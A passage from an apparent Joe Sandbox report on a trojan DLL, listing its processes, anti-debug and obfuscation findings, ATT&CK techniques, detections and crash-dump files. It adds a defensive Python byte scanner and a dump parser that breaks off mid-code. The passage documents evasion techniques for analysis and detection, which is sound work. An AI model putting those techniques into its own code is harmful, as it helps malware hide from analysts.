Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb2t( source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: winmm.pdbm source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb! source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: combase.pdbWa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb4 source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbZ source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: userenv.pdbvt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbe source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: mscms.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: avicap32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.251566449.000000000351C000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250660218.0000000000C5A000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.262553693.0000000000B9A000.00000004.00000001.sdmp
Source: Binary string: ODBC32.pdbOa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_02CEC28A push ds; iretd 12_2_02CEC29E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_02CEC993 push ds; iretd 12_2_02CEC99E
Source: C:\Windows\SysWOW64\WerFault.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: WerFault.exe, 0000000E.00000003.308936840.0000000004C13000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWP
Source: WerFault.exe, 00000009.00000002.301040929.00000000051BF000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.301075274.0000000004B73000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.317002782.0000000004B47000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000009.00000002.301542912.0000000005298000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_100010A0 mov eax, dword ptr fs:[00000030h] 2_2_100010A0
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort (6 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
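The code findings in this list are byte patterns a static scanner can look for: `mov eax, dword ptr fs:[00000030h]` in 2_2_100010A0 reads the PEB (the usual first step of a BeingDebugged or NtGlobalFlag check), and `push ds; iretd` at 12_2_02CEC28A and 12_2_02CEC993 is an IRET used as an obfuscated control transfer. The scanner below is an added example written for this page; it is not Joe Sandbox's matching logic and contains no code from the analysed DLL. The buffer it scans is constructed for the demo, and the `base` address is illustrative.

```python
"""Static scan for the instruction encodings behind the rundll32.exe code
findings above: a PEB read through FS:[30h] and the push ds; iretd pair.

Added example for this report page; not Joe Sandbox code.  The sample buffer
is constructed here and is not taken from the analysed DLL.
"""
import re

# Byte encodings for 32-bit code.  0x64 is the FS segment-override prefix.
PATTERNS = {
    # 64 A1 30 00 00 00  mov eax, dword ptr fs:[30h]   (moffs32 form, EAX only)
    "peb_read_moffs": re.compile(rb"\x64\xA1\x30\x00\x00\x00"),
    # 64 8B /r disp32    mov r32, dword ptr fs:[30h]   (ModRM mod=00 rm=101, any register)
    "peb_read_modrm": re.compile(rb"\x64\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]\x30\x00\x00\x00"),
    # 64 A1 18 00 00 00  mov eax, dword ptr fs:[18h]   (TEB self pointer; PEB sits at TEB+0x30)
    "teb_read": re.compile(rb"\x64\xA1\x18\x00\x00\x00"),
    # 1E CF              push ds; iretd
    "push_ds_iretd": re.compile(rb"\x1E\xCF"),
}

# What each pattern supports, in the report's own signature wording.
MEANING = {
    "peb_read_moffs": "Contains functionality to read the PEB",
    "peb_read_modrm": "Contains functionality to read the PEB",
    "teb_read": "Contains functionality to read the PEB (via TEB)",
    "push_ds_iretd": "Uses code obfuscation techniques (call, push, ret)",
}


def scan(code, base=0):
    """Return [(pattern_name, address)] for every match, sorted by address.

    `base` is added to the byte offset so hits can be reported as RVAs or VAs.
    The two-byte push ds; iretd pattern is noisy on data, so in real use scan
    executable sections only.
    """
    hits = []
    for name, pat in PATTERNS.items():
        for m in pat.finditer(code):
            hits.append((name, base + m.start()))
    return sorted(hits, key=lambda h: (h[1], h[0]))


def summarise(hits):
    """Collapse hits to the set of report signatures they support."""
    return sorted({MEANING[name] for name, _ in hits})


# Constructed sample: a PEB-based BeingDebugged check, padding, a second PEB
# read through EDX, then the push ds; iretd pair.
SAMPLE = bytes.fromhex(
    "64A130000000"    # mov eax, dword ptr fs:[30h]
    "0FB64002"        # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    "85C0"            # test eax, eax
    "7502"            # jne short +2
    "9090"            # nop; nop
    "648B1530000000"  # mov edx, dword ptr fs:[30h]
    "1ECF"            # push ds; iretd
)

if __name__ == "__main__":
    # 0x10000000 is illustrative; the report's unpacked images were based there.
    for name, addr in scan(SAMPLE, base=0x10000000):
        print(f"{addr:08X}  {name:16}  {MEANING[name]}")
```

On the real file, run `scan` over the bytes of each executable section with `base` set to that section's virtual address; a PEB read alone is common in legitimate runtime code, so treat it as corroborating evidence next to the DebugPort queries above rather than as a verdict on its own.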

Mitre Att&ck Matrix

Listed per tactic (the original was rendered as a 14-column grid). Superscript digits are the signature-hit markers carried over from the original matrix; techniques without one were not observed in this analysis.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: Process Injection¹², Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Defense Evasion: Rundll32¹, Virtualization/Sandbox Evasion¹¹, Process Injection¹², Obfuscated Files or Information¹, Software Packing, Steganography
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Query Registry¹, Security Software Discovery¹¹, Process Discovery¹, Virtualization/Sandbox Evasion¹¹, System Information Discovery¹, Remote System Discovery¹
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: Data Obfuscation, Junk Data, Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features

Behavior Graph

(The rendered graph is not reproduced; the data it carried follows.)

Behavior Graph ID: 483798; Sample: SecuriteInfo.com.Trojan.Age...; Start date: 15/09/2021; Architecture: WINDOWS; Score: 56
Signatures on the sample node: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file
Process chain: loaddll32.exe started rundll32.exe, cmd.exe and a second rundll32.exe; cmd.exe started a third rundll32.exe; each rundll32.exe instance was followed by a WerFault.exe crash handler. The WerFault.exe under the rundll32.exe that loaddll32.exe started directly is shown contacting 192.168.2.1 (country and ASN unknown).

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | 63% | Virustotal |
SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | 29% | Metadefender |
SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | 75% | ReversingLabs | Win32.Trojan.Spynoon
SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll | 100% | Avira | HEUR/AGEN.1142362

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
2.2.rundll32.exe.10000000.0.unpack | 100% | Avira | HEUR/AGEN.1142362
12.0.rundll32.exe.10000000.1.unpack | 100% | Avira | HEUR/AGEN.1142362
2.0.rundll32.exe.10000000.1.unpack | 100% | Avira | HEUR/AGEN.1142362
3.0.rundll32.exe.10000000.1.unpack | 100% | Avira | HEUR/AGEN.1142362
3.2.rundll32.exe.10000000.0.unpack | 100% | Avira | HEUR/AGEN.1142362
12.2.rundll32.exe.10000000.0.unpack | 100% | Avira | HEUR/AGEN.1142362
2.0.rundll32.exe.10000000.0.unpack | 100% | Avira | HEUR/AGEN.1142362
12.0.rundll32.exe.10000000.0.unpack | 100% | Avira | HEUR/AGEN.1142362
3.0.rundll32.exe.10000000.0.unpack | 100% | Avira | HEUR/AGEN.1142362

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://watson.telemetry.mSg | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name: https://watson.telemetry.mSg
Source: WerFault.exe, 0000000A.00000002.301075274.0000000004B73000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Contacted IPs

Public: none

Private: 192.168.2.1

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:483798
Start date:15.09.2021
Start time:13:54:39
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 4s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:SecuriteInfo.com.Trojan.Agent.FHBA.20741.16185 (renamed file extension from 16185 to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:33
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.winDLL@12/12@0/1
EGA Information:Failed
HDC Information:
  • Successful, ratio: 100% (good quality ratio 100%)
  • Quality average: 68.5%
  • Quality standard deviation: 31.5%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 1
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 204.79.197.200, 13.107.21.200, 52.168.117.173, 20.50.102.62, 13.89.179.12, 40.112.88.60, 23.216.77.208, 23.216.77.209
  • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
  • Not all processes were analyzed; the report is missing behavior information

Simulations

Behavior and APIs

Time | Type | Description
13:55:40 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
13:56:02 | API Interceptor | 3x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_319baef4101f2973dda1833cdb25524ddf68727_82810a17_037c2054\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13856
Entropy (8bit):3.7644506551629697
Encrypted:false
SSDEEP:192:oXKib0oXYHBUZMX4jed+WbZaB/u7sAS274ItWc8:xiFXABUZMX4jetgB/u7sAX4ItWc8
MD5:55D69FCC221DF5ECC6B86E05BAE57FEE
SHA1:9BE7CBC355F85BF5CBCB65E617593414C3B25F15
SHA-256:861068C4CCE44E75672C4127970C3E3BD40C22352F75746E3569070E42448D9D
SHA-512:D787232F16D0B8441A29AB8BF31512A0E24F5B1B9AD23F827B5CDBC3C64634922FF80EE58D39C30720A64398F635303402241CA8465BFB181596EBE43F33EA1F
Malicious:false
Reputation:low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.1.2.9.4.2.9.2.2.6.7.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.1.2.9.6.0.5.7.8.8.8.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.3.c.e.0.7.4.-.d.d.6.e.-.4.5.c.3.-.a.e.3.4.-.7.5.7.2.c.0.a.3.8.c.d.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.a.4.e.e.d.f.-.1.b.3.5.-.4.e.2.e.-.b.4.c.0.-.a.f.9.0.a.4.8.9.f.3.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.d.8.-.0.0.0.1.-.0.0.1.6.-.4.4.3.6.-.6.b.0.8.7.4.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_319baef4101f2973dda1833cdb25524ddf68727_82810a17_0b983b00\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13858
Entropy (8bit):3.7656137962971967
Encrypted:false
SSDEEP:192:INDis0oXHHBUZMX4jed+9buvG/u7sAS274ItWcy:kiqXnBUZMX4jeOCG/u7sAX4ItWcy
MD5:317DB4323B765F81B014D9D98CCAF111
SHA1:3BD88F8282440A70A250C9F8E6FD2CCF3F176C38
SHA-256:300DFC2AA34B1859D0A5BF9EAB9A271724AB98C11904E8727293C208E0FA9086
SHA-512:4782F55BAA4A279CC6A1986552659632EC7CD6BAC7136CEA45F53A5A990807EC086473CC09EF51B8E17F6E153B7607C5B2CA7AB89533A667EAAE0DD523378A8D
Malicious:false
Reputation:low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.1.2.9.4.8.5.0.3.3.8.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.1.2.9.6.7.7.0.6.4.7.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.1.7.4.7.2.9.-.f.0.7.9.-.4.2.f.a.-.a.d.6.7.-.0.0.c.f.f.f.b.0.4.e.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.2.a.6.c.6.7.-.f.a.6.2.-.4.4.5.d.-.a.0.8.d.-.e.b.2.8.2.8.9.6.b.1.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.f.4.-.0.0.0.1.-.0.0.1.6.-.5.6.8.9.-.8.b.0.a.7.4.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_319baef4101f2973dda1833cdb25524ddf68727_82810a17_14efad18\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13858
Entropy (8bit):3.765102037821312
Encrypted:false
SSDEEP:192:5gi9x0oXzHBUZMX4jed+V3ceJ/u7sbS274ItWcy:qi9/XzBUZMX4jemsA/u7sbX4ItWcy
MD5:1212155A94E3B4F2BDE2E18E2A2A54D3
SHA1:EBF175BCBBE55D99B0E139C2F5D820BE8AD50466
SHA-256:CFD4CDAA362A48FC99F1ECCAEAB6FAAF67D1E32F2A44C979AB9660D471948188
SHA-512:D0A0FBDF86769148DDB49427695BDEDC51527A9C8BCE765FF4198B649BED364242187B84B26F4FD082A913763A0CACE3D38EE27CFADACDA940D07A2D7C2DEC42
Malicious:false
Reputation:low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.1.2.9.4.2.9.5.4.7.3.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.1.2.9.6.1.2.6.7.1.8.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.1.6.0.d.9.0.-.8.2.1.7.-.4.3.a.f.-.a.c.b.6.-.2.1.b.2.8.4.4.5.a.4.f.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.4.d.0.1.4.7.-.2.1.f.3.-.4.8.e.6.-.9.5.1.0.-.e.6.4.b.f.b.6.f.e.6.e.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.0.4.-.0.0.0.1.-.0.0.1.6.-.f.7.3.7.-.6.e.0.8.7.4.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E6B.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 20:55:46 2021, 0x1205a4 type
Category:dropped
Size (bytes):54826
Entropy (8bit):2.0688427633566238
Encrypted:false
SSDEEP:192:BmWdPSWb0Y3VtB+t28e78XdLMDho6bVOs9DARSGzS8k1QndC+:tdPSWb0oVtrSdLMS+ws9ERS2SMdC+
MD5:238E9A735958FDDB081E9EB2CCF3F5F2
SHA1:FDAE50B6B9FEB64AFD9899081B5A38082ABFEECB
SHA-256:7624312B70F1318D512112433F91647EC45B4D27FD185AC480804EBC8CCC90C2
SHA-512:CAC03DCBEB3A86737533B3AD044AE2D34922797D30CEC30C1A890B1891A166FA52983D82843104B44699E1C4F51C689B667D1ACA0818C2E4120B6BF80666EC71
Malicious:false
Preview: MDMP....... ........]Ba...................U...........B......,&......GenuineIntelW...........T............]Ba.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
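`file` describes each WER*.tmp.dmp above as a minidump with 14 streams and type 0x1205a4. Those values come straight from the 32-byte MINIDUMP_HEADER, and the type field tells an analyst what the dump contains before it is opened in a debugger. The parser below is an added example for this page, not Joe Sandbox or Microsoft code; its input is a header and stream directory constructed here to mirror the reported values (14 streams, the 2021-09-15 20:55:46 UTC timestamp, flags 0x1205a4), and the stream types in the constructed directory are illustrative rather than read from a real dump.

```python
"""Parse the MINIDUMP_HEADER and stream directory of a WER crash dump.

Added example for triaging the WER*.tmp.dmp files listed in this report; not
Joe Sandbox or Microsoft code.  Constants follow minidumpapiset.h.  The sample
bytes are constructed here to mirror what `file` printed for those dumps; the
stream types in the constructed directory are illustrative.
"""
import struct
from datetime import datetime, timezone

# MINIDUMP_TYPE flag bits
MINIDUMP_TYPE = {
    0x00000001: "MiniDumpWithDataSegs",
    0x00000002: "MiniDumpWithFullMemory",
    0x00000004: "MiniDumpWithHandleData",
    0x00000008: "MiniDumpFilterMemory",
    0x00000010: "MiniDumpScanMemory",
    0x00000020: "MiniDumpWithUnloadedModules",
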